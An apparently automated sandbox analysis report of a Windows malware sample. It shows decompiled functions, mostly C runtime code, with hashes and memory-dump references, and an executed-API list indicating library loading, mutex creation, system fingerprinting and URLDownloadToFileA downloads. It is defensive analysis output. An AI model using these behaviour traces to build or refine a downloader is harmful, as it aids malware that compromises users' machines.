                  0x00410763
                  0x00410763
                  0x00410763
                  0x00000000
                  0x00410767
                  0x004106f2
                  0x004106f5
                  0x004106fb
                  0x004106fe
                  0x00410725
                  0x00410728
                  0x0041072e
                  0x00000000
                  0x00000000
                  0x00410730
                  0x00410733
                  0x00000000
                  0x00000000
                  0x00410735
                  0x00410735
                  0x0041073b
                  0x0041073e
                  0x004106ac
                  0x004106ac
                  0x00410747
                  0x00000000
                  0x00410747
                  0x00410700
                  0x00410703
                  0x00000000
                  0x00000000
                  0x00410707
                  0x00410718
                  0x0041071e
                  0x00410720
                  0x00410723
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410723
                  0x004106c0
                  0x004106c3
                  0x004106c5
                  0x004106cb
                  0x004106cb
                  0x00000000
                  0x0041069b
                  0x0041069b
                  0x004106a0
                  0x004106a4
                  0x004106a4
                  0x00000000
                  0x004106a0
                  0x00410699

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004106B3
                  • __isleadbyte_l.LIBCMT ref: 004106E7
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004027F0,?,00000000,00000000,?,?,?,?,004027F0), ref: 00410718
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004027F0,00000001,00000000,00000000,?,?,?,?,004027F0), ref: 00410786
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 60becb60b63d865f785cf5946297ae9db3ac0c3028fa36e955b8d80b4f64d528
                  • Instruction ID: 4f983da7cac33738cb305310807754d87b0ebe7c7c516589cd6ac99ed7485cd3
                  • Opcode Fuzzy Hash: 60becb60b63d865f785cf5946297ae9db3ac0c3028fa36e955b8d80b4f64d528
                  • Instruction Fuzzy Hash: A831B131600245EFDB21EF64C8849EA3BB5FF41310F14856AE4A59B2D1E7B4DDE0DB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00403D1E(void* __ebx, void* __edx, void* __edi, long _a4) {
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t3;
                  				void* _t4;
                  				long _t5;
                  				void* _t9;
                  				long _t16;
                  				long _t18;
                  
                  				_t14 = __edi;
                  				_t9 = __ebx;
                  				if( *0x451064 == 0) {
                  					E0040AF7C(__edi);
                  					E0040ADAB(__edx, 0x1e);
                  					E00406F32(0xff);
                  				}
                  				_t3 =  *0x477ae0;
                  				if(_t3 != 1) {
                  					_t16 = _a4;
                  					__eflags = _t3 - 3;
                  					if(__eflags != 0) {
                  						L8:
                  						__eflags = _t16;
                  						if(_t16 == 0) {
                  							_t16 = _t16 + 1;
                  							__eflags = _t16;
                  						}
                  						_t18 = _t16 + 0x0000000f & 0xfffffff0;
                  						__eflags = _t18;
                  						_t4 = HeapAlloc( *0x451064, 0, _t18);
                  					} else {
                  						_push(_t16);
                  						_t4 = E00403CCF(_t9, _t14, _t16, __eflags);
                  						__eflags = _t4;
                  						if(_t4 == 0) {
                  							goto L8;
                  						}
                  					}
                  					return _t4;
                  				} else {
                  					_t5 = _a4;
                  					if(_t5 == 0) {
                  						_t5 = _t5 + 1;
                  					}
                  					return HeapAlloc( *0x451064, 0, _t5);
                  				}
                  			}











                  0x00403d1e
                  0x00403d1e
                  0x00403d2a
                  0x00403d2c
                  0x00403d33
                  0x00403d3d
                  0x00403d43
                  0x00403d44
                  0x00403d4c
                  0x00403d68
                  0x00403d6b
                  0x00403d6e
                  0x00403d7b
                  0x00403d7b
                  0x00403d7d
                  0x00403d7f
                  0x00403d7f
                  0x00403d7f
                  0x00403d83
                  0x00403d83
                  0x00403d8f
                  0x00403d70
                  0x00403d70
                  0x00403d71
                  0x00403d77
                  0x00403d79
                  0x00000000
                  0x00000000
                  0x00403d79
                  0x00403d97
                  0x00403d4e
                  0x00403d4e
                  0x00403d53
                  0x00403d55
                  0x00403d55
                  0x00403d66
                  0x00403d66

                  APIs
                  • __FF_MSGBANNER.LIBCMT ref: 00403D2C
                    • Part of subcall function 0040AF7C: __set_error_mode.LIBCMT ref: 0040AF7E
                    • Part of subcall function 0040AF7C: __set_error_mode.LIBCMT ref: 0040AF8B
                    • Part of subcall function 0040AF7C: __NMSG_WRITE.LIBCMT ref: 0040AFA3
                    • Part of subcall function 0040AF7C: __NMSG_WRITE.LIBCMT ref: 0040AFAD
                  • __NMSG_WRITE.LIBCMT ref: 00403D33
                    • Part of subcall function 0040ADAB: __set_error_mode.LIBCMT ref: 0040ADDC
                    • Part of subcall function 0040ADAB: __set_error_mode.LIBCMT ref: 0040ADED
                    • Part of subcall function 0040ADAB: _strcpy_s.LIBCMT ref: 0040AE21
                    • Part of subcall function 0040ADAB: __invoke_watson.LIBCMT ref: 0040AE32
                    • Part of subcall function 0040ADAB: GetModuleFileNameA.KERNEL32(00000000,00450B59,00000104), ref: 0040AE4E
                    • Part of subcall function 0040ADAB: _strcpy_s.LIBCMT ref: 0040AE63
                    • Part of subcall function 0040ADAB: __invoke_watson.LIBCMT ref: 0040AE76
                    • Part of subcall function 0040ADAB: _strlen.LIBCMT ref: 0040AE7F
                    • Part of subcall function 0040ADAB: _strlen.LIBCMT ref: 0040AE8C
                    • Part of subcall function 0040ADAB: __invoke_watson.LIBCMT ref: 0040AEB9
                    • Part of subcall function 00406F32: ___crtCorExitProcess.LIBCMT ref: 00406F3A
                    • Part of subcall function 00406F32: ExitProcess.KERNEL32 ref: 00406F43
                  • HeapAlloc.KERNEL32(00000000,?), ref: 00403D5F
                  • HeapAlloc.KERNEL32(00000000,?), ref: 00403D8F
                    • Part of subcall function 00403CCF: __lock.LIBCMT ref: 00403CEC
                    • Part of subcall function 00403CCF: ___sbh_alloc_block.LIBCMT ref: 00403CF7
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __set_error_mode$__invoke_watson$AllocExitHeapProcess_strcpy_s_strlen$FileModuleName___crt___sbh_alloc_block__lock
                  • String ID:
                  • API String ID: 913549098-0
                  • Opcode ID: 482a7ec7c1538f4dcfcac1c3ce06f56321dca5e2e73b5d8e38b13513c69ed0e2
                  • Instruction ID: a0093f41eda6d994e8e1248c9cc684adc6a7dad3323883db2e81e9ef6f030ed7
                  • Opcode Fuzzy Hash: 482a7ec7c1538f4dcfcac1c3ce06f56321dca5e2e73b5d8e38b13513c69ed0e2
                  • Instruction Fuzzy Hash: 58F0F4315443556ADB206B29EC02FAB3B4DEF40726F14003BF909FA6E2D7349E90828C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0040B81D(void* __eax, void* __esi) {
                  				int _t5;
                  				void* _t9;
                  				void* _t15;
                  				void** _t17;
                  				void* _t19;
                  
                  				_t15 = __esi +  *((intOrPtr*)(_t19 + 0x57));
                  				_t9 = 0;
                  				if( *0x477ac0 > 0) {
                  					_push(_t15);
                  					_t17 =  *0x477ac4 + 0x10;
                  					do {
                  						VirtualFree( *(_t17 - 4), 0, 0x8000);
                  						HeapFree( *0x451064, 0,  *_t17);
                  						_t17 =  &(_t17[5]);
                  						_t9 = _t9 + 1;
                  					} while (_t9 <  *0x477ac0);
                  				}
                  				HeapFree( *0x451064, 0,  *0x477ac4);
                  				_t5 = HeapDestroy( *0x451064);
                  				 *0x451064 =  *0x451064 & 0x00000000;
                  				return _t5;
                  			}








                  0x0040b822
                  0x0040b826
                  0x0040b835
                  0x0040b837
                  0x0040b83e
                  0x0040b841
                  0x0040b84b
                  0x0040b85b
                  0x0040b85d
                  0x0040b860
                  0x0040b861
                  0x0040b869
                  0x0040b878
                  0x0040b882
                  0x0040b888
                  0x0040b88f

                  APIs
                  • VirtualFree.KERNEL32(?,00000000,00008000,?), ref: 0040B84B
                  • HeapFree.KERNEL32(00000000,?), ref: 0040B85B
                  • HeapFree.KERNEL32(00000000), ref: 0040B878
                  • HeapDestroy.KERNEL32 ref: 0040B882
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: FreeHeap$DestroyVirtual
                  • String ID:
                  • API String ID: 765507482-0
                  • Opcode ID: dea781d90f75536c2c4e9540bc81ab10a238bc1b66f3b6966da7b4f55cc6ad9b
                  • Instruction ID: 49f223527289a946423448659bfbee9b67926336a8bb584dee585ec93c51e40f
                  • Opcode Fuzzy Hash: dea781d90f75536c2c4e9540bc81ab10a238bc1b66f3b6966da7b4f55cc6ad9b
                  • Instruction Fuzzy Hash: 85F06D32100310BFEB115F54ED86B8A3F25FB80716FA50075E60AB24B2C3726C94CB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0044CF50() {
                  				void* __ebx;
                  				void* __edi;
                  				intOrPtr _t1;
                  				void* _t2;
                  				intOrPtr _t8;
                  				intOrPtr _t10;
                  				intOrPtr _t12;
                  
                  				_t1 =  *0x477a9c;
                  				_t8 =  *0x46f394;
                  				_t12 = _t1;
                  				if(_t1 == 0x5dd) {
                  					SetSystemTimeAdjustment(0, 0);
                  					_t1 =  *0x477a9c;
                  				}
                  				_t10 =  *0x450100; // 0xdd409db6
                  				 *0x46f384 = _t10;
                  				if(_t1 == 0x114e) {
                  					GetFileAttributesW(0);
                  					_t1 =  *0x477a9c;
                  				}
                  				if(_t1 == 0xa57) {
                  					TerminateProcess(0, 0);
                  				}
                  				_t2 = E0044CEC0(_t8, _t12);
                  				if( *0x477a9c == 0x568) {
                  					return SizeofResource(0, 0);
                  				}
                  				return _t2;
                  			}










                  0x0044cf50
                  0x0044cf56
                  0x0044cf5d
                  0x0044cf64
                  0x0044cf6a
                  0x0044cf70
                  0x0044cf70
                  0x0044cf75
                  0x0044cf7b
                  0x0044cf86
                  0x0044cf8a
                  0x0044cf90
                  0x0044cf90
                  0x0044cf9a
                  0x0044cfa0
                  0x0044cfa0
                  0x0044cfa6
                  0x0044cfb7
                  0x00000000
                  0x0044cfbd
                  0x0044cfc3

                  APIs
                  • SetSystemTimeAdjustment.KERNEL32 ref: 0044CF6A
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0044CF8A
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0044CFA0
                  • SizeofResource.KERNEL32(00000000,00000000), ref: 0044CFBD
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AdjustmentAttributesFileProcessResourceSizeofSystemTerminateTime
                  • String ID:
                  • API String ID: 835657949-0
                  • Opcode ID: c7c6253ac80d24948a52e079fe0131289d2174b8ce9170a856baea8b7c5318a6
                  • Instruction ID: 5b4c0bc44df70d089e2735ecb56adace77b56ed44e52e91cfa2bf8eccc7b1cf3
                  • Opcode Fuzzy Hash: c7c6253ac80d24948a52e079fe0131289d2174b8ce9170a856baea8b7c5318a6
                  • Instruction Fuzzy Hash: D6F03A322497009BF7609B64FC89B0A3765F304B12F644036E60CD67E1D7A869848E2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E0040EDEF(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				signed int _t13;
                  				intOrPtr _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t30 = __eflags;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ebx;
                  				_push(0xc);
                  				_push(0x47e3c8);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t28 = E0040694F(__ebx, __edx, __edi, _t30);
                  				_t13 =  *0x44fc64; // 0xfffffffe
                  				if(( *(_t28 + 0x70) & _t13) == 0) {
                  					L6:
                  					E0040CFC1(_t22, 0xc);
                  					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                  					_t8 = _t28 + 0x6c; // 0x6c
                  					_t26 =  *0x44fd48; // 0x44fc70
                  					 *((intOrPtr*)(_t29 - 0x1c)) = E0040EDB1(_t8, _t26);
                  					 *(_t29 - 4) = 0xfffffffe;
                  					E0040EE59();
                  				} else {
                  					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                  						goto L6;
                  					} else {
                  						_t28 =  *((intOrPtr*)(E0040694F(_t22, __edx, _t26, _t32) + 0x6c));
                  					}
                  				}
                  				if(_t28 == 0) {
                  					E00406EDE(_t25, _t26, 0x20);
                  				}
                  				return E00404209(_t28);
                  			}







                  0x0040edef
                  0x0040edef
                  0x0040edef
                  0x0040edef
                  0x0040edef
                  0x0040edf1
                  0x0040edf6
                  0x0040ee00
                  0x0040ee02
                  0x0040ee0a
                  0x0040ee2e
                  0x0040ee30
                  0x0040ee36
                  0x0040ee3a
                  0x0040ee3d
                  0x0040ee48
                  0x0040ee4b
                  0x0040ee52
                  0x0040ee0c
                  0x0040ee0c
                  0x0040ee10
                  0x00000000
                  0x0040ee12
                  0x0040ee17
                  0x0040ee17
                  0x0040ee10
                  0x0040ee1c
                  0x0040ee20
                  0x0040ee25
                  0x0040ee2d

                  APIs
                  • __getptd.LIBCMT ref: 0040EDFB
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __getptd.LIBCMT ref: 0040EE12
                  • __amsg_exit.LIBCMT ref: 0040EE20
                  • __lock.LIBCMT ref: 0040EE30
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: 15f58c9301b0172e0387239efca916a9301374c61c1ce286b80ea978aea05d69
                  • Instruction ID: 3e3d4133c6a718485f5c28ecf7e0e793d7499db6af47586b5f701f391de7fb33
                  • Opcode Fuzzy Hash: 15f58c9301b0172e0387239efca916a9301374c61c1ce286b80ea978aea05d69
                  • Instruction Fuzzy Hash: 28F06D72A04719CAD720BB67C40674A72A0AF40724F11467FA8417B6D3CB3CA961CA9E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404014() {
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				intOrPtr _t10;
                  				void* _t12;
                  				intOrPtr _t15;
                  				intOrPtr* _t16;
                  				signed int _t19;
                  				signed int _t20;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  
                  				_t5 =  *0x478c20;
                  				_t26 = 0x14;
                  				if(_t5 != 0) {
                  					if(_t5 < _t26) {
                  						_t5 = _t26;
                  						goto L4;
                  					}
                  				} else {
                  					_t5 = 0x200;
                  					L4:
                  					 *0x478c20 = _t5;
                  				}
                  				_t6 = E00406D1F(_t5, 4);
                  				 *0x477c18 = _t6;
                  				if(_t6 != 0) {
                  					L8:
                  					_t19 = 0;
                  					_t15 = 0x44f250;
                  					while(1) {
                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                  						_t15 = _t15 + 0x20;
                  						_t19 = _t19 + 4;
                  						if(_t15 >= 0x44f4d0) {
                  							break;
                  						}
                  						_t6 =  *0x477c18;
                  					}
                  					_t27 = 0xfffffffe;
                  					_t20 = 0;
                  					_t16 = 0x44f260;
                  					do {
                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x477b00 + (_t20 >> 5) * 4))));
                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                  							 *_t16 = _t27;
                  						}
                  						_t16 = _t16 + 0x20;
                  						_t20 = _t20 + 1;
                  					} while (_t16 < 0x44f2c0);
                  					return 0;
                  				} else {
                  					 *0x478c20 = _t26;
                  					_t6 = E00406D1F(_t26, 4);
                  					 *0x477c18 = _t6;
                  					if(_t6 != 0) {
                  						goto L8;
                  					} else {
                  						_t12 = 0x1a;
                  						return _t12;
                  					}
                  				}
                  			}













                  0x00404014
                  0x0040401c
                  0x0040401f
                  0x0040402a
                  0x0040402c
                  0x00000000
                  0x0040402c
                  0x00404021
                  0x00404021
                  0x0040402e
                  0x0040402e
                  0x0040402e
                  0x00404036
                  0x0040403d
                  0x00404044
                  0x00404064
                  0x00404064
                  0x00404066
                  0x00404072
                  0x00404072
                  0x00404075
                  0x00404078
                  0x00404081
                  0x00000000
                  0x00000000
                  0x0040406d
                  0x0040406d
                  0x00404085
                  0x00404086
                  0x00404088
                  0x0040408e
                  0x004040a2
                  0x004040a8
                  0x004040b2
                  0x004040b2
                  0x004040b4
                  0x004040b7
                  0x004040b8
                  0x004040c4
                  0x00404046
                  0x00404049
                  0x0040404f
                  0x00404056
                  0x0040405d
                  0x00000000
                  0x0040405f
                  0x00404061
                  0x00404063
                  0x00404063
                  0x0040405d

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: |G
                  • API String ID: 3494438863-2889776443
                  • Opcode ID: d864ea3139a69e3665b7705cde4bf1bf089d0d8f2d1b1b18354d158635182879
                  • Instruction ID: be3a411c15aacff8a7ebef11b62c21c1e4cd2e32de436807a0a606ceca99a1ce
                  • Opcode Fuzzy Hash: d864ea3139a69e3665b7705cde4bf1bf089d0d8f2d1b1b18354d158635182879
                  • Instruction Fuzzy Hash: C711C6B17082115BF7258A2DBD5066622D5ABC8338B24453FE705FB3D0EB78D8C1868D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00401900() {
                  				intOrPtr _v8;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v40;
                  				char _v44;
                  				char _v84;
                  				signed int _t12;
                  				void* _t21;
                  				void* _t25;
                  				void* _t26;
                  				signed int _t29;
                  
                  				_push(0xffffffff);
                  				_push(E0044EC98);
                  				_push( *[fs:0x0]);
                  				_t12 =  *0x44f0d4; // 0x45b66027
                  				_t13 = _t12 ^ _t29;
                  				_push(_t12 ^ _t29);
                  				 *[fs:0x0] =  &_v16;
                  				_v20 = 0xf;
                  				_v24 = 0;
                  				_v40 = 0;
                  				E00401620( &_v44, "vector<T> too long", E00402470("vector<T> too long"));
                  				_v8 = 0;
                  				E00401090(_t13,  &_v44);
                  				_v84 = 0x47b248;
                  				E00402FB0( &_v84, 0x47e918);
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				_push(0);
                  				return E00402D54(_t21, _t25, _t26, _t13);
                  			}















                  0x00401903
                  0x00401905
                  0x00401910
                  0x00401914
                  0x00401919
                  0x0040191b
                  0x0040191f
                  0x0040192a
                  0x00401931
                  0x00401938
                  0x0040194d
                  0x00401959
                  0x00401960
                  0x0040196e
                  0x00401975
                  0x0040197a
                  0x0040197b
                  0x0040197c
                  0x0040197d
                  0x0040197e
                  0x0040197f
                  0x00401980
                  0x0040198a

                  APIs
                  • _strlen.LIBCMT ref: 0040193C
                  • __CxxThrowException@8.LIBCMT ref: 00401975
                    • Part of subcall function 00402FB0: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,0047E950,004507A0,?,?,?), ref: 00402FF2
                    • Part of subcall function 00402D54: _malloc.LIBCMT ref: 00402D6E
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ExceptionException@8RaiseThrow_malloc_strlen
                  • String ID: vector<T> too long
                  • API String ID: 28560481-3788999226
                  • Opcode ID: c84a64312c3579ad334ff054af386ad48c5c0744a95a0f774d599943b139bbe3
                  • Instruction ID: e524f7ada34da74ab4faf928a754424169bb489ab26e1aa60b2f5b7f0744af8b
                  • Opcode Fuzzy Hash: c84a64312c3579ad334ff054af386ad48c5c0744a95a0f774d599943b139bbe3
                  • Instruction Fuzzy Hash: 7D0181F1800208ABD700EFD1CD06BEEB7B8EB15708F50062AF509766C1DBB9560887AA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040C19B(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                  				intOrPtr _t17;
                  				intOrPtr* _t28;
                  				void* _t29;
                  
                  				_t30 = __eflags;
                  				_t28 = __esi;
                  				_t27 = __edi;
                  				_t26 = __edx;
                  				_t19 = __ebx;
                  				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                  				E0040334F(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                  				 *((intOrPtr*)(E0040694F(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                  				_t17 = E0040694F(_t19, _t26, _t27, _t30);
                  				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                  				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                  					_t17 =  *((intOrPtr*)(__esi + 0x14));
                  					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                  						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                  							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                  							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                  								_t17 = E00403328(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                  								_t38 = _t17;
                  								if(_t17 != 0) {
                  									_push( *((intOrPtr*)(_t29 + 0x10)));
                  									_push(_t28);
                  									return E0040BB4A(_t38);
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _t17;
                  			}






                  0x0040c19b
                  0x0040c19b
                  0x0040c19b
                  0x0040c19b
                  0x0040c19b
                  0x0040c19e
                  0x0040c1a4
                  0x0040c1b2
                  0x0040c1b8
                  0x0040c1c0
                  0x0040c1cc
                  0x0040c1d4
                  0x0040c1dc
                  0x0040c1f0
                  0x0040c1f2
                  0x0040c1f6
                  0x0040c1fb
                  0x0040c201
                  0x0040c203
                  0x0040c205
                  0x0040c208
                  0x00000000
                  0x0040c20f
                  0x0040c203
                  0x0040c1f6
                  0x0040c1f0
                  0x0040c1dc
                  0x0040c210

                  APIs
                    • Part of subcall function 0040334F: __getptd.LIBCMT ref: 00403355
                    • Part of subcall function 0040334F: __getptd.LIBCMT ref: 00403365
                  • __getptd.LIBCMT ref: 0040C1AA
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __getptd.LIBCMT ref: 0040C1B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: bb3a2d7612f5f480703136905e0ff94cb71e5a3d0bb95be6e1e9c3f96ffa3db3
                  • Instruction ID: bd73d2abc73afc3e7d3afd0a0fbd92bfe56f259b39e54f4ea741264420b91c76
                  • Opcode Fuzzy Hash: bb3a2d7612f5f480703136905e0ff94cb71e5a3d0bb95be6e1e9c3f96ffa3db3
                  • Instruction Fuzzy Hash: 66014F34C40205DACF349FA1C480A6EB7B9BF60315F54497FE841BABD1CB399991CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  • LoadLibraryA.KERNEL32(?,?,?,?,?,0040138B,?,00034A95,0040138B), ref: 004157ED
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00415819
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00415848
                  • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 00415872
                  • memset.MSVCRT ref: 0041589A
                  • GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 004158C0
                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00415B04
                  • LoadLibraryA.KERNEL32(?), ref: 00415B2F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00415B56
                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00415BE8
                  • CloseHandle.KERNEL32(00000000), ref: 00415C7E
                  • CloseHandle.KERNEL32(?), ref: 00418027
                  • CloseHandle.KERNEL32(?,?), ref: 00418033
                  • CloseHandle.KERNEL32(?,?,?), ref: 0041803F
                  • CloseHandle.KERNEL32(?,?,?,?), ref: 0041804B
                  • CloseHandle.KERNEL32(?,?,?,?,?), ref: 00418057
                  • CloseHandle.KERNEL32(?), ref: 00418D2E
                  • CloseHandle.KERNEL32(?,?), ref: 00418D3A
                  • CloseHandle.KERNEL32(?), ref: 00419039
                  • CloseHandle.KERNEL32(?,?), ref: 00419045
                  • CloseHandle.KERNEL32(?,?,?), ref: 00419051
                    • Part of subcall function 0040CFBC: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,00419D1B), ref: 0040D008
                    • Part of subcall function 0040CFBC: RegQueryValueExW.ADVAPI32(00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D04E
                    • Part of subcall function 0040CFBC: RegCloseKey.ADVAPI32(00419D1B,00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D05F
                  • CloseHandle.KERNEL32(?), ref: 004190E0
                  • CloseHandle.KERNEL32(?,?), ref: 004190EC
                  • CloseHandle.KERNEL32(?,?,?), ref: 004190F8
                  • LoadLibraryA.KERNEL32(?), ref: 0041AAF9
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AB39
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AB6C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AB9F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041ABD2
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AC05
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AC36
                  • memset.MSVCRT ref: 0041AE66
                  • SetLastError.KERNEL32(00000000), ref: 0041AED3
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000200,00000000), ref: 0041AEDC
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000,00000000,?,00000200,00000000), ref: 0041AEE7
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 0041AEF8
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000,00000000,?,00000200,00000000), ref: 0041AF8E
                  • GetComputerNameW.KERNEL32 ref: 0041B0C0
                  • GetDesktopWindow.USER32 ref: 0041B584
